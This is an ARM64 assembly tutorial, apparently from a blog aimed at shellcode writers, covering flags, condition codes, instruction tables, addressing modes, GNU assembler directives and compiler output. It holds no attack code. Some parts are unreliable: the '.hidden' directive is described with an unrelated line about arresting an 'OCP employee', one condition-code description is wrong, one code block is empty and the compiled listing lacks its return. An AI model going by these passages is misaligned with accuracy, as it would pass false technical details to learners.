ARM has a “process state” with condition flags that affect the behaviour of some instructions. Branch instructions can be used to change the flow of execution. Some of the data processing instructions allow setting the condition flags with the S suffix. e.g ANDS or ADDS. The flags are the Zero Flag (Z), the Carry Flag (C), the Negative Flag (N) and the is Overflow Flag (V).

Flag Description
N Bit 31. Set if the result of an operation is negative. Cleared if the result is positive or zero.
Z Bit 30. Set if the result of an operation is zero/equal. Cleared if non-zero/not equal.
C Bit 29. Set if an instruction results in a carry or overflow. Cleared if no carry.
V Bit 28. Set if an instruction results in an overflow. Cleared if no overflow.

### 1.6 Condition Codes

The A32 instruction set supports conditional execution for most of its operations. To improve performance, ARM removed support with A64. These conditional codes are now only effective with branch, select and compare instructions. This appears to be a disadvantage, but there are sufficient alternatives in the A64 set that are a distinct improvement.

Mnemonic Description Condition flags
EQ Equal Z set
NE Not Equal Z clear
CS or HS Carry Set C set
CC or LO Carry Clear C clear
MI Minus N set
PL Plus, positive or zero N clear
VS Overflow V set
VC No overflow V clear
HI Unsigned Higher than or equal C set and Z clear
LS Unsigned Less than or equal C clear or Z set
GE Signed Greater than or Equal N and V the same
LT Signed Less than N and V differ
GT Signed Greater than Z clear, N and V the same
LE Signed Less than or Equal Z set, N and V differ
AL Always. Normally omitted. Any

### 1.7 Data Types

A “word” on x86 is 16-bits and a “doubleword” is 32-bits. A “word” for ARM is 32-bits and a “doubleword” is 64-bits.

Type Size
Byte 8 bits
Half-word 16 bits
Word 32 bits
Doubleword 64 bits

### 1.8 Data Alignment

The alignment of sp must be two times the size of a pointer. For AArch32 that’s 8 bytes, and for AArch64 it’s 16 bytes.

## 2. A64 Instruction Set

Like all previous ARM architectures, ARMv8-A is a load/store architecture. Data processing instructions do not operate directly on data in memory as we find with the x86 architecture. The data is first loaded into registers, modified, and then stored back in memory or simply discarded once it’s no longer required. Most data processing instructions use one destination register and two source operands. The general format can be considered as the instruction, followed by the operands, as follows:

`Instruction Rd, Rn, Operand2`

Rd is the destination register. Rn is the register that is operated on. The use of R indicates that the registers can be either X or W registers. Operand2 might be a register, a modified register, or an immediate value.

### 2.1 Arithmetic

The following instructions can be used for arithmetic, stack allocation and addressing of memory, control flow, and initialization of registers or variables.

Menmonic Operands Instruction
ADD{S} (immediate) Rd, Rn, #imm{, shift} Add (immediate) adds a register value and an optionally-shifted immediate value, and writes the result to the destination register.
ADD{S} (extended register) Rd, Rn, Wm{, extend {#amount}} Add (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
ADD{S} (shifted register) Rd, Rn, Rm{, shift #amount} Add (shifted register) adds a register value and an optionally-shifted register value, and writes the result to the destination register.
ADR Xd, rel Form PC-relative address adds an immediate value to the PC value to form a PC-relative address, and writes the result to the destination register.
ADRP Xd, rel Form PC-relative address to 4KB page adds an immediate value that is shifted left by 12 bits, to the PC value to form a PC-relative address, with the bottom 12 bits masked out, and writes the result to the destination register.
CMN (extended register) Rn, Rm{, extend {#amount}} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMN (immediate) Rn, #imm{, shift} Compare Negative (immediate) adds a register value and an optionally-shifted immediate value. It updates the condition flags based on the result, and discards the result.
CMN (shifted register) Rn, Rm{, shift #amount} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (extended register) Rn, Rm{, extend {#amount}} Compare (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (immediate) Rn, #imm{, shift} Compare (immediate) subtracts an optionally-shifted immediate value from a register value. It updates the condition flags based on the result, and discards the result.
CMP (shifted register) Rn, Rm{, shift #amount} Compare (shifted register) subtracts an optionally-shifted register value from a register value. It updates the condition flags based on the result, and discards the result.
MADD Rd, Rn, Rm, ra Multiply-Add multiplies two register values, adds a third register value, and writes the result to the destination register.
MNEG Rd, Rn, Rm Multiply-Negate multiplies two register values, negates the product, and writes the result to the destination register. Alias of MSUB.
MSUB Rd, Rn, Rm, ra Multiply-Subtract multiplies two register values, subtracts the product from a third register value, and writes the
result to the destination register.
MUL Rd, Rn, Rm Multiply. Alias of MADD.
NEG{S} Rd, op2 Negate (shifted register) negates an optionally-shifted register value, and writes the result to the destination register.
NGC{S} Rd, Rm Negate with Carry negates the sum of a register value and the value of NOT (Carry flag), and writes the result to the destination register.
SBC{S} Rd, Rn, Rm Subtract with Carry subtracts a register value and the value of NOT (Carry flag) from a register value, and writes the result to the destination register.
{U|S}DIV Rd, Rn, Rm Unsigned/Signed Divide divides a signed integer register value by another signed integer register value, and writes the result to the destination register. The condition flags are not affected.
{U|S}MADDL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Add Long multiplies two 32-bit register values, adds a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MNEGL Xd, Wn, Wm Unsigned/Signed Multiply-Negate Long multiplies two 32-bit register values, negates the product, and writes the result to the 64-bit destination register.
{U|S}MSUBL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Subtract Long multiplies two 32-bit register values, subtracts the product from a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MULH Xd, Xn, Xm Unsigned/Signed Multiply High multiplies two 64-bit register values, and writes bits[127:64] of the 128-bit result to the 64-bit destination register.
{U|S}MULL Xd, Wn, Wm Unsigned/Signed Multiply Long multiplies two 32-bit register values, and writes the result to the 64-bit destination register.
SUB{S} (extended register) Rd, Rn, Rm{, shift #amount} Subtract (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
SUB{S} (immediate) Rd, Rn, Rm{, shift #amount} Subtract (immediate) subtracts an optionally-shifted immediate value from a register value, and writes the result to the destination register.
SUB{S} (shift register) Rd, Rn, Rm{, shift #amount} Subtract (shifted register) subtracts an optionally-shifted register value from a register value, and writes the result to the destination register.
```  // x0 == -1?
cmn     x0, 1
beq     minus_one

// x0 == 0
cmp     x0, 0
beq     zero

// allocate 32 bytes of stack
sub     sp, sp, 32

// x0 = x0 % 37
mov     x1, 37
udiv    x2, x0, x1
msub    x0, x2, x1, x0

// x0 = 0
sub     x0, x0, x0
```

### 2.2 Logical and Move

Mainly used for bit testing and manipulation. To a large degree, cryptographic algorithms use these operations exclusively to be efficient in both hardware and software. Implementing bitwise operations in hardware is relatively cheap.

Mnemonic Operands Instruction
AND{S} (immediate) Rd, Rn, #imm Bitwise AND (immediate) performs a bitwise AND of a register value and an immediate value, and writes the result to the destination register.
AND{S} (shifted register) Rd, Rn, Rm, {shift #amount} Bitwise AND (shifted register) performs a bitwise AND of a register value and an optionally-shifted register value, and writes the result to the destination register.
ASR (register) Rd, Rn, Rm Arithmetic Shift Right (register) shifts a register value right by a variable number of bits, shifting in copies of its sign bit, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
ASR (immediate) Rd, Rn, #imm Arithmetic Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in copies of the sign bit in the upper bits and zeros in the lower bits, and writes the result to the destination register.
BIC{S} Rd, Rn, Rm Bitwise Bit Clear (shifted register) performs a bitwise AND of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
EON Rd, Rn, Rm {, shift amount} Bitwise Exclusive OR NOT (shifted register) performs a bitwise Exclusive OR NOT of a register value and an optionally-shifted register value, and writes the result to the destination register.
EOR Rd, Rn, #imm Bitwise Exclusive OR (immediate) performs a bitwise Exclusive OR of a register value and an immediate value, and writes the result to the destination register.
EOR Rd, Rn, Rm Bitwise Exclusive OR (shifted register) performs a bitwise Exclusive OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
LSL (register) Rd, Rn, Rm Logical Shift Left (register) shifts a register value left by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is left-shifted. Alias of LSLV.
LSL (immediate) Rd, Rn, #imm Logical Shift Left (immediate) shifts a register value left by an immediate number of bits, shifting in zeros, and writes the result to the destination register. Alias of UBFM.
LSR (register) Rd, Rn, Rm Logical Shift Right (register) shifts a register value right by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
LSR Rd, Rn, #imm Logical Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in zeros, and writes the result to the destination register.
MOV (register) Rd, Rn Move (register) copies the value in a source register to the destination register. Alias of ORR.
MOV (immediate) Rd, #imm Move (wide immediate) moves a 16-bit immediate value to a register. Alias of MOVZ.
MOVK Rd, #imm{, shift #amount} Move wide with keep moves an optionally-shifted 16-bit immediate value into a register, keeping other bits unchanged.
MOVN Rd, #imm{, shift #amount} Move wide with NOT moves the inverse of an optionally-shifted 16-bit immediate value to a register.
MOVZ Rd, #imm Move wide with zero moves an optionally-shifted 16-bit immediate value to a register.
MVN Rd, Rm{, shift #amount} Bitwise NOT writes the bitwise inverse of a register value to the destination register. Alias of ORN.
ORN Rd, Rn, Rm{, shift #amount} Bitwise OR NOT (shifted register) performs a bitwise (inclusive) OR of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
ORR Rd, Rn, #imm Bitwise OR (immediate) performs a bitwise (inclusive) OR of a register value and an immediate register value, and writes the result to the destination register.
ORR Rd, Rn, Rm{, shift #amount} Bitwise OR (shifted register) performs a bitwise (inclusive) OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
ROR Rd, Rs, #shift Rotate right (immediate) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. Alias of EXTR.
ROR Rd, Rn, Rm Rotate Right (register) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted. Alias of RORV.
TST Rn, #imm Test bits (immediate), setting the condition flags and discarding the result. Alias of ANDS.
TST Rn, Rm{, shift #amount} Test (shifted register) performs a bitwise AND operation on a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result. Alias of ANDS.

Multiplication can be performed using logical shift left LSL. Division can be performed using logical shift right LSR. Modulo operations can be performed using bitwise AND. The only condition is that the multiplier and divisor be a power of two. The first three examples shown here demonstrate those operations.

```  // x1 = x0 / 8
lsr     x1, x0, 3

// x1 = x0 * 4
lsl     x1, x0, 2

// x1 = x0 % 16
and     x1, x0, 15

// x0 == 0?
tst     x0, x0
beq     zero

// x0 = 0
eor     x0, x0, x0
```

The following are the main instructions used for loading and storing data. There are others of course, designed for privileged/unprivileged loads, unscaled/unaligned loads, atomicity, and exclusive registers. However, as a beginner these are the only ones you need to worry about for now.

Mnemonic Operands Instruction
LDR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Load Register (immediate) loads a word or doubleword from memory and writes it to a register. The address that is used for the load is calculated from a base register and an immediate offset.
LDR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Load Register (register) calculates an address from a base register value and an offset register value, loads a byte/half-word/word from memory, and writes it to a register. The offset register value can optionally be shifted and extended.
STR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
STR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
LDP Wt1, Wt2, [Xn|SP], #imm Load Pair of Registers calculates an address from a base register value and an immediate offset, loads two 32-bit words or two 64-bit doublewords from memory, and writes them to two registers.
STP Wt1, Wt2, [Xn|SP], #imm Store Pair of Registers calculates an address from a base register value and an immediate offset, and stores two 32-bit words or two 64-bit doublewords to the calculated address, from two registers
```  // load a byte from x1
ldrb    w0, [x1]

// load a signed byte from x1
ldrsb   w0, [x1]

// store a 32-bit word to address in x1
str     w0, [x1]

ldp     w0, w1, [sp], 8

// store two 64-bit words at [sp-96] and subtract 96 from sp
stp     x0, x1, [sp, -96]!

// load 32-bit immediate from literal pool
ldr     w0, =0x12345678
```
Addressing Mode Immediate Register Extended Register
Base register only (no offset) [base{, 0}]
Base plus offset [base{, imm}] [base, Xm{, LSL imm}] [base, Wm, (S|U)XTW {#imm}]
Pre-indexed [base, imm]!
Post-indexed [base], imm [base], Xm a
Literal (PC-relative) label

### Base register only

```  // load a byte from x1
ldrb   w0, [x1]

// load a half-word from x1
ldrh   w0, [x1]

// load a word from x1
ldr    w0, [x1]

// load a doubleword from x1
ldr    x0, [x1]
```

### Base register plus offset

```  // load a byte from x1 plus 1
ldrb   w0, [x1, 1]

// load a half-word from x1 plus 2
ldrh   w0, [x1, 2]

// load a word from x1 plus 4
ldr    w0, [x1, 4]

// load a doubleword from x1 plus 8
ldr    x0, [x1, 8]

// load a doubleword from x1 using x2 as index
// w2 is multiplied by 8
ldr    x0, [x1, x2, lsl 3]

// load a doubleword from x1 using w2 as index
// w2 is zero-extended and multiplied by 8
ldr    x0, [x1, w2, uxtw 3]
```

### Pre-index

The exclamation mark “!” implies adding the offset after the load or store.

```  // load a byte from x1 plus 1, then advance x1 by 1
ldrb   w0, [x1, 1]!

// load a half-word from x1 plus 2, then advance x1 by 2
ldrh   w0, [x1, 2]!

// load a word from x1 plus 4, then advance x1 by 4
ldr    w0, [x1, 4]!

// load a doubleword from x1 plus 8, then advance x1 by 8
ldr    x0, [x1, 8]!
```

### Post-index

This mode accesses the value first and then adds the offset to base.

```  // load a byte from x1, then advance x1 by 1
ldrb   w0, [x1], 1

ldrh   w0, [x1], 2

ldr    w0, [x1], 4

ldr    x0, [x1], 8
```

### Literal (PC-relative)

These instructions work similar to RIP-relative addressing on AMD64.

```  // load address of label

```

### 2.4 Conditional

These instructions select between the first or second source register, depending on the current state of the condition flags. When the named condition is true, the first source register is selected and its value is copied without modification to the destination register. When the condition is false the second source register is selected and its value might be optionally inverted, negated, or incremented by one, before writing to the destination register.

CSEL is essentially like the ternary operator in C. Probably my favorite instruction of ARM64 since it can be used to replace two or more opcodes.

Mnemonic Operands Instruction
CCMN (immediate) Rn, #imm, #nzcv, cond Conditional Compare Negative (immediate) sets the value of the condition flags to the result of the comparison of a register value and a negated immediate value if the condition is TRUE, and an immediate value otherwise.
CCMN (register) Rn, Rm, #nzcv, cond Conditional Compare Negative (register) sets the value of the condition flags to the result of the comparison of a register value and the inverse of another register value if the condition is TRUE, and an immediate value otherwise.
CCMP (immediate) Rn, #imm, #nzcv, cond Conditional Compare (immediate) sets the value of the condition flags to the result of the comparison of a register value and an immediate value if the condition is TRUE, and an immediate value otherwise.
CCMP (register) Rn, Rm, #nzcv, cond Conditional Compare (register) sets the value of the condition flags to the result of the comparison of two registers if the condition is TRUE, and an immediate value otherwise.
CSEL Rd, Rn, Rm, cond Conditional Select returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register.
CSINC Rd, Rn, Rm, cond Conditional Select Increment returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register incremented by 1. Used by CINC and CSET.
CSINV Rd, Rn, Rm, cond Conditional Select Invert returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the bitwise inversion value of the second source register. Used by CINV and CSETM.
CSNEG Rd, Rn, Rm, cond Conditional Select Negation returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the negated value of the second source register. Used by CNEG.
CSET Rd, cond Conditional Set sets the destination register to 1 if the condition is TRUE, and otherwise sets it to 0.
CSETM Rd, cond Conditional Set Mask sets all bits of the destination register to 1 if the condition is TRUE, and otherwise sets all bits to 0.
CINC Rd, Rn, cond Conditional Increment returns, in the destination register, the value of the source register incremented by 1 if the condition is TRUE, and otherwise returns the value of the source register.
CINV Rd, Rn, cond Conditional Invert returns, in the destination register, the bitwise inversion of the value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
CNEG Rd, Rn, cond Conditional Negate returns, in the destination register, the negated value of the source register if the condition is TRUE, and otherwise returns the value of the source register.

Let’s consider the following `if` statement.

```if (c == 0 && x == y) {
// body of if statement
}
```

If the first condition evaulates to true (c equals zero), only then is the second condition evaluated. To implement the above statement in assembly, one could use the following.

```    cmp    c, 0
bne    false

cmp    x, y
bne    false
true:
// body of if statement
false:
// end of if statement
```

We could eliminate one instruction using conditional execution on ARMv7-A. Consider using the following instead.

```    cmp    c, 0
cmpeq  x, y
bne    false
```

To improve performance of AArch64, ARM removed support for conditional execution and replaced it with specialised instructions such as the conditional compare instructions. Using ARMv8-A, the following can be used.

```    cmp    c, 0
ccmp   x, y, 0, eq
bne    false

// conditions are true:
false:
```

The ternary operator can be used for the same if statement.

```bEqual = (c == 0) ? (x == y) : 0;
```

If `cmp c, 0` evaluates to true (ZF=1), `ccmp x, y` is evaluated, otherwise ZF is cleared using 0. Other conditions require different flags. Each flag is set using 1, 2, 4 or 8. Combine these values to set multiple flags. I’ve defined the flags below and also each condition required for a branch.

```    .equ FLAG_V, 1
.equ FLAG_C, 2
.equ FLAG_Z, 4
.equ FLAG_N, 8

.equ NE, 0
.equ EQ, FLAG_Z

.equ GT, 0
.equ GE, FLAG_Z

.equ LT, (FLAG_N + FLAG_C)
.equ LE, (FLAG_N + FLAG_Z + FLAG_C)

.equ HI, (FLAG_N + FLAG_C)          // unsigned version of LT
.equ HS, (FLAG_N + FLAG_Z + FLAG_C) // LE

.equ LO, 0                        // unsigned version of GT
.equ LS, FLAG_Z                   // GE
```

### 2.5 Bit Manipulation

Most of these instructions are intended to extract or move bits from one register to another. They tend to be useful when working with bytes or words where contents of the destination register needs to be preserved, zero or sign extended.

Mnemonic Operands Instruction
BFI Rd, Rn, #lsb, #width Bitfield Insert copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFM Rd, Rn, #immr, #imms Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at
any position in the destination register, leaving other bits unchanged.
BFXIL Rd, Rn, #lsb, #width Bitfield extract and insert at low end copies any number of low-order bits from a source register into the same
number of adjacent bits at the low end in the destination register, leaving other bits unchanged.
CLS Rd, Rn Count leading sign bits.
CLZ Rd, Rn Count leading zero bits.
EXTR Rd, Rn, Rm, #lsb Extract register extracts a register from a pair of registers.
RBIT Rd, Rn Reverse Bits reverses the bit order in a register.
REV16 Rd, Rn Reverse bytes in 16-bit halfwords reverses the byte order in each 16-bit halfword of a register.
REV32 Rd, Rn Reverse bytes in 32-bit words reverses the byte order in each 32-bit word of a register.
REV64 Rd, Rn Reverse Bytes reverses the byte order in a 64-bit general-purpose register.
SBFIZ Rd, Rn, #lsb, #width Signed Bitfield Insert in Zero zeroes the destination register and copies any number of contiguous bits from a source register into any position in the destination register, sign-extending the most significant bit of the transferred value. Alias of SBFM.
SBFM Wd, Wn, #immr, #imms Signed Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, shifting in copies of the sign bit in the upper bits and zeros in the lower bits.
SBFX Rd, Rn, #lsb, #width Signed Bitfield Extract extracts any number of adjacent bits at any position from a register, sign-extends them to the size of the register, and writes the result to the destination register.
{S,U}XT{B,H,W} Rd, Rn (S)igned/(U)nsigned eXtend (B)yte/(H)alfword/(W)ord extracts an 8-bit,16-bit or 32-bit value from a register, zero-extends it to the size of the register, and writes the result to the destination register. Alias of UBFM.
```    // Move 0x12345678 into w0.
mov     w0, 0x5678
mov     w1, 0x1234
bfi     w0, w1, 16, 16

// Extract 8-bits from x1 into the x0 register at position 0.
// If x1 is 0x12345678, 0x00000056 is placed in x0.
ubfx    x0, x1, 8, 8

// Extract 8-bits from x1 and insert with zeros into the x0 register at position 8.
// If x1 is 0x12345678, 0x00005600 is placed in x0.
ubfiz   x0, x1, 8, 8

// Extract 8-bits from x1 and insert into x0 at position 0.
// if x1 is 0x12345678 and x0 is 0x09ABCDEF. x0 after execution has 0x09ABCD78
bfxil   x0, x1, 0, 8

// Clear lower 8 bits.
bfxil   x0, xzr, 0, 8

// Zero-extend 8-bits
uxtb    x0, x0

```

### 2.6 Branch

Branch instructions change the flow of execution using the condition flags or value of a general-purpose register. Branches are referred to as “jumps” in x86 assembly.

Mnemonic Operands Instruction
B label Branch causes an unconditional branch to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
B.cond label Branch conditionally to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
BL label Branch with Link branches to a PC-relative offset, setting the register X30 to PC+4. It provides a hint that this is a subroutine call.
BLR Xn Branch with Link to Register calls a subroutine at an address in a register, setting register X30 to PC+4.
BR Xn Branch to Register branches unconditionally to an address in a register, with a hint that this is not a subroutine return.
CBNZ Rn, label Compare and Branch on Nonzero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect the condition flags.
CBZ Rn, label Compare and Branch on Zero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
RET Xn Return from subroutine branches unconditionally to an address in a register, with a hint that this is a subroutine return.
TBNZ Rn, #imm, label Test bit and Branch if Nonzero compares the value of a bit in a general-purpose register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
TBZ Rn, #imm, label Test bit and Branch if Zero compares the value of a test bit with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.

Testing for TRUE or FALSE after calling a subroutine is so common, that it makes perfect sense to have conditional branch instructions such as TBZ/TBNZ and CBZ/CBNZ. The only instruction that comes close to these on x86 would be JCXZ that jumps if the value of the CX register is zero. However, x86 subroutines normally return results in the accumulator (AX) and the counter register (CX) is normally used for iterations/loops.

### 2.7 System

The main system instruction for shellcodes is the supervisor call SVC

Mnemonic Instruction
MSR Move general-purpose register to System Register allows the PE to write an AArch64 System register from a
general-purpose register.
MRS Move System Register allows the PE to read an AArch64 System register into a general-purpose register.
SVC Supervisor Call causes an exception to be taken to EL1.
NOP No Operation does nothing, other than advance the value of the program counter by 4. This instruction can be used
for instruction alignment purposes.

There’s a special-purpose register that allows you to read and write to the conditional flags called NZCV.

```  // read the condition flags
.equ OVERFLOW_FLAG, 1 << 28
.equ CARRY_FLAG,    1 << 29
.equ ZERO_FLAG,     1 << 30
.equ NEGATIVE_FLAG, 1 << 31

mrs    x0, nzcv

// set the C flag
mov    w0, CARRY_FLAG
msr    nzcv, x0
```

### 2.8 x86 and A64 comparison

The following table lists x86 instructions and their equivalent for A64. It’s not a comprehensive list by any means. It’s mainly the more common instructions you’ll likely use or see in disassembled code. In some cases, x86 does not have an equivalent instruction and is therefore not included.

x86 Mnemonic A64 Mnemonic Instruction
MOVZX UXT Zero-Extend.
MOVSX SXT Sign-Extend.
BSWAP REV Reverse byte order.
SHR LSR Logical Shift Right.
SHL LSL Logical Shift Left.
XOR EOR Bitwise exclusive-OR.
OR ORR Bitwise OR.
NOT MVN Bitwise NOT.
SHRD EXTR Double precision shift right / Extract register from pair of registers.
SAR ASR Arithmetic Shift Right.
SBB SBC Subtract with Borrow / Subtract with Carry
TEST TST Perform a bitwise AND, set flags and discard result.
CALL BL Branch with Link / Call a subroutine.
JNE BNE Jump/Branch if Not Equal.
JS BMI Jump/Branch if Signed / Minus.
JG BGT Jump/Branch if Greater.
JGE BGE Jump/Branch if Greater or Equal.
JE BEQ Jump/Branch if Equal.
JC/JB BCS / BHS Jump/Branch if Carry / Borrow
JNC/JNB BCC / BLO Jump/Branch if No Carry / No Borrow
JAE BPL Jump if Above or Equal / Branch if Plus, positive or Zero.

## 3. GNU Assembler

The GNU toolchain includes the compiler collection (gcc), debugger (gdb), the C library (glibc), an assembler (gas) and linker (ld). The GNU Assembler (GAS) supports many architectures, so if you’re just starting to write ARM assembly, I cannot currently recommend a better assembler for Linux. Having said that, readers may wish to experiment with other products.

### 3.1 Preprocessor Directives

The following directives are what I personally found the most useful when writing assembly code with GAS.

Directive Instruction
.arch name Specifies the target architecture. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target architecture. Examples include: `armv8-a`, `armv8.1-a`, `armv8.2-a`, `armv8.3-a`, `armv8.4-a`. Equivalent to the `-march` option in GCC.
.cpu name Specifies the target processor. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target processor. Examples include: `cortex-a53`, `cortex-a76`. Equivalent to the `-mcpu` option in GCC.
.include “file” Include assembly code from “file”.
.macro name arguments Allows you to define macros that generate assembly output.
.if `.if` marks the beginning of a section of code which is only considered part of the source program being assembled if the argument (which must be an absolute expression) is non-zero. The end of the conditional section of code must be marked by `.endif`
.global symbol `.global` makes the symbol visible to `ld`.
.equ symbol, expression Equate. Define a symbolic constant. Equivalent to the define directive in C.
.set symbol, expression Set the value of symbol to expression.If symbol was flagged as external, it remains flagged. Similar to the equate directive (.EQU) except the value can be changed later.
name .req register name This creates an alias for register name called name. For example: `A .req x0`
.size Tells the assembler how much space a function or object is using. If a function is unused, the linker can exclude it.
.struct expression Switch to the absolute section, and set the section offset to expression, which must be an absolute expression.
.skip size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.space’.
.space size, fill TThis directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.skip’.
.text subsection Tells as to assemble the following statements onto the end of the text subsection numbered subsection, which is an absolute expression. If subsection is omitted, subsection number zero is used.
.data subsection .data tells as to assemble the following statements onto the end of the data subsection numbered subsection (which is an absolute expression). If subsection is omitted, it defaults to zero.
.bss Section for uninitialized data.
.align abs-expr , abs-expr , abs-expr Pad the location counter (in the current subsection) to a particular storage boundary. The first expression (which must be absolute) is the alignment required, as described below. The second expression (also absolute) gives the fill value to be stored in the padding bytes. It (and the comma) may be omitted. If it is omitted, the padding bytes are normally zero. However, on some systems, if the section is marked as containing code and the fill value is omitted, the space is filled with no-op instructions. The third expression is also absolute, and is also optional. If it is present, it is the maximum number of bytes that should be skipped by this alignment directive. If doing the alignment would require skipping more bytes than the specified maximum, then the alignment is not done at all. You can omit the fill value (the second argument) entirely by simply using two commas after the required alignment; this can be useful if you want the alignment to be filled with no-op instructions when appropriate.
.ascii “string” .ascii expects zero or more string literals separated by commas. It assembles each string (with no automatic trailing zero byte) into consecutive addresses.
.hidden Any attempt to arrest a senior OCP employee results in shutdown.
.asciz “string” .asciz is just like .ascii, but each string is followed by a zero byte. The “z” in ‘.asciz’ stands for “zero”.
.string str .string8 str .string16 str The variants string16, string32 and string64 differ from the string pseudo opcode in that each 8-bit character from str is copied and expanded to 16, 32 or 64 bits respectively. The expanded characters are stored in target endianness byte order.
.byte Declares a variable of 8-bits.
.hword/.2byte Declares a variable of 16-bits. The second ensures only 16-bits.
.word/.4byte Declares a variable of 32-bits. The second ensures only 32-bits.
.quad/.8byte Declares a variable of 64-bits. The second ensures only 64-bits.

### 3.2 GCC Assembly

GCC can be incredibly useful when first starting to learn any assembly language because it provides an option to generate assembly output from source code using the -S option. If you want to generate assembly with source code, compile with -g and -c options, then dump with objdump -d -S. Most people want their applications optimized for speed rather than size, so it stands to reason the GNU C optimizer is not terribly efficient at generating compact code. Our new A.I overlords might be able to change all that, but at least for now, a human wins at writing compact assembly code.

Just to illustrate using an example. Here’s a subroutine that does nothing useful.

```#include <stdio.h>

void calc(int a, int b) {
int i;

for(i=0;i<4;i++) {
printf("%i\n", ((a * i) + b) % 5);
}
}
```

Compile this code using -Os option to optimize for size. The following assembly is generated by GCC. Recall that x30 is the link register and saved here because of the call to printf. We also have to use callee saved registers x19-x22 for storing variables because x0-x18 are trashed by the call to printf.

```	.arch armv8-a
.file	"calc.c"
.text
.align	2
.global	calc
.type	calc, %function
calc:
stp	x29, x30, [sp, -64]!    // store x29, x30 (LR) on stack
add	x29, sp, 0              // x29 = sp
stp	x21, x22, [sp, 32]      // store x21, x22 on stack
adrp	x21, .LC0               // x21 = "%i\n"
stp	x19, x20, [sp, 16]      // store x19, x20 on stack
mov	w22, w0                 // w22 = a
mov	w19, w1                 // w19 = b
add	x21, x21, :lo12:.LC0    // x21 = x21 + 0
str	x23, [sp, 48]           // store x23 on stack
mov	w20, 4                  // i = 4
mov	w23, 5                  // divisor = 5 for modulus
.L2:
sdiv	w1, w19, w23            // w1 = b / 5
mov	x0, x21                 // x0 = "%i\n"
add	w1, w1, w1, lsl 2       // w1 *= 5
sub	w1, w19, w1             // w1 = b - ((b / 5) * 5)
add	w19, w19, w22           // b += a
bl	printf

subs	w20, w20, #1            // i = i - 1
bne	.L2                     // while (i != 0)

ldp	x19, x20, [sp, 16]      // restore x19, x20
ldp	x21, x22, [sp, 32]      // restore x21, x22
ldr	x23, [sp, 48]           // restore x23
ldp	x29, x30, [sp], 64      // restore x29, x30 (LR)

.size	calc, .-calc
.section	.rodata.str1.1,"aMS",@progbits,1
.LC0:
.string	"%i\n"
.ident	"GCC: (Debian 6.3.0-18) 6.3.0 20170516"
.section	.note.GNU-stack,"",@progbits
```

i is initialized to 4 instead of 0 and decreased rather than increased. There’s no modulus instruction in the A64 set, and division instructions don’t produce a remainder, so the calculation is performed using a combination of division, multiplication and subtraction. The modulo operation is calculated with the following : `R = N - ((N / D) * D)`

